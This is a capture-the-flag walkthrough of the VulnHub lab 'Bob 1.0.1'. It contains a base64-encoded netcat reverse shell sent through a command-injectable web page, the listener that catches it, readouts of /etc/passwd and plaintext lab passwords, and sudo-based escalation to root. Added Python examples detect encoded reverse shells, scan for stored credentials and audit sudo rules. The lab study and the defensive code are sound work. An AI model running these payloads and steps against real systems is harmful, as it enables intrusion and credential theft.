VulnHub : Bob 1.0.1
27 June, 2021
Machine Link: https://www.vulnhub.com/entry/bob-101,226/
Starting off with an nmap scan
# nmap -A -sC -sV -O -p 1-65535 192.168.110.103
Starting Nmap 7.91 ( https://nmap.org )
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.110.103
Host is up (0.00092s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-robots.txt: 4 disallowed entries
| /login.php /dev_shell.php /lat_memo.html
|_/passwords.html
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
25468/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
| 2048 84:f2:f8:e5:ed:3e:14:f3:93:d4:1e:4c:41:3b:a2:a9 (RSA)
| 256 5b:98:c7:4f:84:6e:fd:56:6a:35:16:83:aa:9c:ea:f8 (ECDSA)
|_ 256 39:16:56:fb:4e:0f:50:85:40:d3:53:22:41:43:38:15 (ED25519)
MAC Address: 08:00:27:69:0E:18 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.92 ms 192.168.110.103
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.28 seconds
Out of the paths listed in robots.txt, dev_shell.php was the most interesting one, since I was able to run a few commands on the machine through it:
# curl 'http://192.168.110.103/dev_shell.php' --data-raw 'in_command=id'
<html>
<body>
<style>
#back{
position: fixed;
top: 0;
left: 0;
min-width: 100%;
min-height: 100%;
z-index:-10
}
#shell{
color: white;
text-align: center;
}
</style>
<!-- WIP, don't forget to report any bugs we don't want another breach guys
-Bob -->
<div id="shell">
<h2>
dev_shell
</h2>
<form action="dev_shell.php" method="post">
Command: <input type="text" name="in_command" /> <br>
<input type="submit" value="submit">
</form>
<br>
<h5>Output:</h5>
uid=33(www-data) gid=33(www-data) groups=33(www-data),100(users)
</div>
<img src="dev_shell_back.png" id="back" alt="">
</body>
</html>
But a filter was being applied, and certain commands were definitely blocked:
$ curl 'http://192.168.110.103/dev_shell.php' --data-raw 'in_command=pwd'
<html>
<body>
<style>
#back{
position: fixed;
top: 0;
left: 0;
min-width: 100%;
min-height: 100%;
z-index:-10
}
#shell{
color: white;
text-align: center;
}
</style>
<!-- WIP, don't forget to report any bugs we don't want another breach guys
-Bob -->
<div id="shell">
<h2>
dev_shell
</h2>
<form action="dev_shell.php" method="post">
Command: <input type="text" name="in_command" /> <br>
<input type="submit" value="submit">
</form>
<br>
<h5>Output:</h5>
Get out skid lol
</div>
<img src="dev_shell_back.png" id="back" alt="">
</body>
</html>
So I base64-encoded the reverse shell command and, as the input, gave a command that decodes it and pipes the result to bash:
echo -n cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTkyLjE2OC4xMTAuMTAyIDQyNDIgPi90bXAvZg== | base64 --decode | bash
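Two things are worth pinning down from the filter and the bypass above: why a word denylist in front of a shell cannot hold, and what a detection that actually looks inside the submitted command has to do. The following is an added example written for this writeup, not the machine's dev_shell.php and not code from the author; the denylist words other than "pwd" are an assumption (the page only shows "pwd" being refused), and the payload string is the one submitted above. It shows the denylist letting the encoded payload through, a small inspector that peels the base64 layer and flags reverse-shell building blocks, and the hardened shape of such a page: a fixed table of named actions run without any shell.

```python
import base64
import re
import subprocess

# Payload from this writeup: a base64 blob piped to a decoder and then to bash.
PAGE_PAYLOAD = (
    "echo -n cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8"
    "bmMgMTkyLjE2OC4xMTAuMTAyIDQyNDIgPi90bXAvZg== | base64 --decode | bash"
)

# Word denylist in the spirit of dev_shell.php. The page only shows that "pwd"
# is refused ("Get out skid lol"); the rest of this list is an assumption.
DENYLIST = {"pwd", "ls", "cat", "nc"}


def denylist_blocks(command: str) -> bool:
    """True if a whole-word denylist would refuse the command.

    This is the weak check: it only sees the literal words typed, so a payload
    that hides its real words inside an encoding passes untouched.
    """
    words = set(re.split(r"\s+", command.strip()))
    return bool(words & DENYLIST)


# Detection side: peel encodings first, then look for reverse-shell building blocks.
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
INDICATORS = {
    "mkfifo": re.compile(r"\bmkfifo\b"),
    "interactive_shell": re.compile(r"/bin/(?:ba)?sh\s+-i\b"),
    "netcat": re.compile(r"\b(?:nc|ncat|netcat)\b"),
    "stderr_redirect": re.compile(r"2>&1"),
    "dev_tcp": re.compile(r"/dev/tcp/"),
}


def decode_embedded_base64(command: str) -> list:
    """Return every base64 run in the command that decodes to valid UTF-8 text."""
    decoded = []
    for match in B64_RE.finditer(command):
        try:
            decoded.append(base64.b64decode(match.group(0), validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue  # not really base64, or binary: ignore this run
    return decoded


def inspect_command(command: str) -> dict:
    """Classify a submitted command, including anything it carries in base64."""
    layers = [command] + decode_embedded_base64(command)
    hits = sorted(name for name, rx in INDICATORS.items() if any(rx.search(layer) for layer in layers))
    return {"decoded": layers[1:], "indicators": hits, "suspicious": bool(hits)}


# Hardened alternative: no shell at all. The user picks a named action from a
# fixed table and nothing they typed is ever placed into argv or a shell string.
ALLOWED_ACTIONS = {
    "whoami": ["whoami"],
    "uptime": ["uptime"],
    "disk": ["df", "-h", "/"],
}


def resolve_action(action: str) -> list:
    """Map an action name to a fixed argv; unknown names are rejected outright."""
    argv = ALLOWED_ACTIONS.get(action)
    if argv is None:
        raise ValueError(f"action not permitted: {action!r}")
    return list(argv)


def run_action(action: str) -> str:
    """Run an allowlisted action without a shell (no shell=True, no string joins)."""
    completed = subprocess.run(resolve_action(action), capture_output=True, text=True, check=False)
    return completed.stdout


if __name__ == "__main__":
    print("denylist blocks 'pwd':", denylist_blocks("pwd"))
    print("denylist blocks page payload:", denylist_blocks(PAGE_PAYLOAD))
    print("inspector verdict:", inspect_command(PAGE_PAYLOAD))
```

The inspector deliberately reports indicator names rather than the decoded command itself; for a log pipeline that is what a rule would alert on, and the decoded text can be kept for the analyst in a separate field.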
This got me a reverse shell as www-data
# nc -lvnp 4242
listening on [any] 4242 ...
connect to [192.168.110.102] from (UNKNOWN) [192.168.110.103] 39416
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data),100(users)
$ ls
WIP.jpg
about.html
contact.html
dev_shell.php
dev_shell.php.bak
dev_shell_back.png
index.html
index.html.bak
lat_memo.html
login.html
news.html
passwords.html
robots.txt
school_badge.png
$ pwd
/var/www/html
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
Debian-exim:x:105:109::/var/spool/exim4:/bin/false
rtkit:x:106:110:RealtimeKit,,,:/proc:/bin/false
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
avahi-autoipd:x:108:111:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
messagebus:x:109:112::/var/run/dbus:/bin/false
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
lightdm:x:112:116:Light Display Manager:/var/lib/lightdm:/bin/false
pulse:x:113:117:PulseAudio daemon,,,:/var/run/pulse:/bin/false
avahi:x:114:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
saned:x:115:121::/var/lib/saned:/bin/false
c0rruptedb1t:x:1000:1000:c0rruptedb1t,,,:/home/c0rruptedb1t:/bin/bash
bob:x:1001:1001:Bob,,,,Not the smartest person:/home/bob:/bin/bash
jc:x:1002:1002:James C,,,:/home/jc:/bin/bash
seb:x:1003:1003:Sebastian W,,,:/home/seb:/bin/bash
elliot:x:1004:1004:Elliot A,,,:/home/elliot:/bin/bash
sshd:x:116:65534::/run/sshd:/usr/sbin/nologin
proftpd:x:117:65534::/run/proftpd:/bin/false
ftp:x:118:65534::/srv/ftp:/bin/false
Found a note inside bob's Documents
$ cat staff.txt
Seb:
Seems to like Elliot
Wants to do well at his job
Gave me a backdoored FTP to instal that apparently Elliot gave him
James:
Does nothing
Pretty Lazy
Doesn't give a shit about his job
Elliot:
Keeps to himself
Always needs to challenge everything I do
Keep an eye on him
Try and get him fired
There was also an encrypted file in there
$ ls -ltrha
total 20K
-rw-r--r-- 1 bob bob 300 Mar 4 2018 staff.txt
drwxr-xr-x 3 bob bob 4.0K Mar 5 2018 Secret
-rw-r--r-- 1 bob bob 91 Mar 5 2018 login.txt.gpg
drwxr-xr-x 3 bob bob 4.0K Mar 5 2018 .
drwxr-xr-x 18 bob bob 4.0K Mar 8 2018 ..
$ file login.txt.gpg
login.txt.gpg: GPG symmetrically encrypted data (AES cipher)
Going deeper into the Secret directory, there is a bash script called notes.sh:
$ ./notes.sh
-= Notes =-
Harry Potter is my faviorite
Are you the real me?
Right, I'm ordering pizza this is going nowhere
People just don't get me
Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh <sea santy here>
Cucumber
Rest now your eyes are sleepy
Are you gonna stop reading this yet?
Time to fix the server
Everyone is annoying
Sticky notes gotta buy em
Inside elliot's home directory I found a file containing a password, which I used to switch to elliot:
$ cat theadminisdumb.txt
The admin is dumb,
In fact everyone in the IT dept is pretty bad but I can’t blame all of them the newbies Sebastian and James are quite new to managing a server so I can forgive them for that password file they made on the server. But the admin now he’s quite something. Thinks he knows more than everyone else in the dept, he always yells at Sebastian and James now they do some dumb stuff but their new and this is just a high-school server who cares, the only people that would try and hack into this are script kiddies. His wallpaper policy also is redundant, why do we need custom wallpapers that doesn’t do anything. I have been suggesting time and time again to Bob ways we could improve the security since he “cares” about it so much but he just yells at me and says I don’t know what i’m doing. Sebastian has noticed and I gave him some tips on better securing his account, I can’t say the same for his friend James who doesn’t care and made his password: Qwerty. To be honest James isn’t the worst bob is his stupid web shell has issues and I keep telling him what he needs to patch but he doesn’t care about what I have to say. it’s only a matter of time before it’s broken into so because of this I have changed my password to
theadminisdumb
I hope bob is fired after the future second breach because of his incompetence. I almost want to fix it myself but at the same time it doesn’t affect me if they get breached, I get paid, he gets fired it’s a good time.
www-data@Milburg-High:/home/elliot$ su elliot
su elliot
Password: theadminisdumb
elliot@Milburg-High:~$ whoami
whoami
elliot
I found another file in bob's home directory with some passwords
elliot@Milburg-High:/home/bob$ cat .old_passwordfile.html
cat .old_passwordfile.html
<html>
<p>
jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3
</p>
</html>
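The recurring weakness on this box is credentials left in plain files: .old_passwordfile.html above, elliot's note, and the gpg file with a guessable passphrase. A defender's sweep for this is simple to write. The following is an added example, not the author's code: it takes the /etc/passwd accounts shown earlier to learn which login names exist, then scans file contents for lines of the form account:secret. The file contents are taken from this page; note that the bare password line in elliot's note is exactly the kind of thing such a pattern cannot attribute, which is why the scan reports where a credential sits rather than claiming completeness.

```python
import re

# /etc/passwd lines as shown on this page, abridged to the accounts that matter here.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
c0rruptedb1t:x:1000:1000:c0rruptedb1t,,,:/home/c0rruptedb1t:/bin/bash
bob:x:1001:1001:Bob,,,,Not the smartest person:/home/bob:/bin/bash
jc:x:1002:1002:James C,,,:/home/jc:/bin/bash
seb:x:1003:1003:Sebastian W,,,:/home/seb:/bin/bash
elliot:x:1004:1004:Elliot A,,,:/home/elliot:/bin/bash
sshd:x:116:65534::/run/sshd:/usr/sbin/nologin
"""

# File contents from the page, keyed by file name (constructed mapping for the example).
SAMPLE_FILES = {
    ".old_passwordfile.html": "<html>\n<p>\njc:Qwerty\nseb:T1tanium_Pa$$word_Hack3rs_Fear_M3\n</p>\n</html>\n",
    "theadminisdumb.txt": "...I have changed my password to\ntheadminisdumb\n",
}

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}


def interactive_accounts(passwd_text: str) -> dict:
    """Map login name -> uid for every account whose shell allows a login."""
    accounts = {}
    for line in passwd_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed line, skip rather than guess
        name, _pw, uid, _gid, _gecos, _home, shell = fields
        if shell not in NOLOGIN_SHELLS:
            accounts[name] = int(uid)
    return accounts


# "<name>:<secret>" or "<name>=<secret>" on a line by itself.
CRED_RE = re.compile(r"^\s*(?P<user>[a-z_][a-z0-9_-]*)\s*[:=]\s*(?P<secret>\S+)\s*$")


def find_credential_lines(files: dict, accounts: dict) -> list:
    """Scan {path: contents} for lines that pair a known login name with a secret.

    The secret itself is deliberately not copied into the finding: a report that
    duplicates passwords into yet another file is part of the problem.
    """
    findings = []
    for path, text in files.items():
        for lineno, line in enumerate(text.splitlines(), 1):
            m = CRED_RE.match(line)
            if m and m.group("user") in accounts:
                findings.append({"file": path, "line": lineno, "user": m.group("user")})
    return findings


if __name__ == "__main__":
    known = interactive_accounts(PASSWD_SAMPLE)
    for hit in find_credential_lines(SAMPLE_FILES, known):
        print(f"{hit['file']}:{hit['line']}: credential for account '{hit['user']}'")
```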
At this point, bob was the only user whose password I didn't have. I had checked most directories and the other common enumeration points; the only thing I learned was that all these users were allowed to run certain commands with sudo without a password:
seb@Milburg-High:/home/bob/Documents$ sudo -l
sudo: unable to resolve host Milburg-High: Connection refused
Matching Defaults entries for seb on Milburg-High:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User seb may run the following commands on Milburg-High:
(ALL) NOPASSWD: /usr/bin/service apache2 *
(root) NOPASSWD: /bin/systemctl start ssh
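Rules like the two above are what a sudoers review should catch before anyone gets a shell on the box: NOPASSWD removes re-authentication, and a trailing "*" in a sudoers command matches across word boundaries, so it accepts any number of extra arguments. The following is an added example, not the author's code: a small auditor that pulls the rule lines out of raw sudo -l output (the sample is seb's output from this page, host-resolution noise included) and scores each one. It also scores the (ALL : ALL) ALL rule that bob turns out to have later on.

```python
import re
from dataclasses import dataclass

# seb's `sudo -l` output as shown on this page, noise lines included so the
# parser has to skip them.
SEB_SUDO_L = r"""
sudo: unable to resolve host Milburg-High: Connection refused
Matching Defaults entries for seb on Milburg-High:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User seb may run the following commands on Milburg-High:
(ALL) NOPASSWD: /usr/bin/service apache2 *
(root) NOPASSWD: /bin/systemctl start ssh
"""

# One rule line as printed by sudo -l: "(runas) TAG: TAG: command args".
RULE_RE = re.compile(r"^\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")


@dataclass
class Finding:
    rule: str
    severity: str  # "high", "medium" or "info"
    reasons: list


def audit_rule(line: str) -> Finding:
    """Score a single sudoers rule line."""
    m = RULE_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a sudo rule line: {line!r}")
    runas, tags, cmd = m.group("runas").strip(), m.group("tags"), m.group("cmd").strip()
    reasons = []
    if cmd == "ALL":
        reasons.append(f"unrestricted: any command as ({runas})")
    if "NOPASSWD" in tags:
        reasons.append("NOPASSWD: no re-authentication before privileged execution")
    if "*" in cmd:
        # sudoers matches the argument list as one concatenated string, so a
        # wildcard matches across word boundaries: any extra arguments are accepted.
        reasons.append("wildcard in arguments: matches across word boundaries")
    if cmd != "ALL" and not cmd.startswith("/"):
        reasons.append("command given without an absolute path")
    if cmd == "ALL" or ("*" in cmd and "NOPASSWD" in tags):
        severity = "high"
    elif reasons:
        severity = "medium"
    else:
        severity = "info"
    return Finding(line.strip(), severity, reasons)


def audit_sudo_l(text: str) -> list:
    """Pick the rule lines out of raw `sudo -l` output and audit each one."""
    return [audit_rule(ln) for ln in text.splitlines() if ln.lstrip().startswith("(")]


if __name__ == "__main__":
    for f in audit_sudo_l(SEB_SUDO_L) + [audit_rule("(ALL : ALL) ALL")]:
        print(f"[{f.severity}] {f.rule}")
        for reason in f.reasons:
            print("   -", reason)
```

The same function can be pointed at /etc/sudoers.d fragments once the "User ... may run" wrapper is stripped, since the rule grammar after the runas group is the same.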
At a dead end, I took a hint from the available writeups, and it turns out that the passphrase for the encrypted file can be formed from the output of notes.sh: the first letter of each line, combined, is the passphrase. This method is called an acrostic cipher.
seb@Milburg-High:/home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here$ ./notes.sh | tail -11 | cut -c1
H
A
R
P
O
C
R
A
T
E
S
seb@Milburg-High:/home/bob/Documents$ gpg --decrypt login.txt.gpg
gpg: AES encrypted data
gpg: encrypted with 1 passphrase
bob:b0bcat_
seb@Milburg-High:/home/bob/Documents$ su bob
Password:
bob@Milburg-High:~$ id
uid=1001(bob) gid=1001(bob) groups=1001(bob),27(sudo)
bob@Milburg-High:~$ whoami
bob
Bob is allowed to run anything via sudo, so switching to root was straightforward:
bob@Milburg-High:~$ sudo -l
sudo: unable to resolve host Milburg-High: Connection refused
Matching Defaults entries for bob on Milburg-High:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User bob may run the following commands on Milburg-High:
(ALL : ALL) ALL
bob@Milburg-High:~$ sudo su
sudo: unable to resolve host Milburg-High: Connection refused
root@Milburg-High:/home/bob# id
uid=0(root) gid=0(root) groups=0(root)
root@Milburg-High:/home/bob# whoami
root
root@Milburg-High:/home/bob# cd /
root@Milburg-High:/# ls
bin dev flag.txt initrd.img lib lost+found mnt proc run srv tmp var vmlinuz.old
boot etc home initrd.img.old lib64 media opt root sbin sys usr vmlinuz
root@Milburg-High:/# cat flag.txt
CONGRATS ON GAINING ROOT
.-.
( )
|~| _.--._
|~|~:'--~' |
| | : #root |
| | : _.--._|
|~|~`'--~'
| |
| |
| |
| |
| |
| |
| |
| |
| |
_____|_|_________ Thanks for playing ~c0rruptedb1t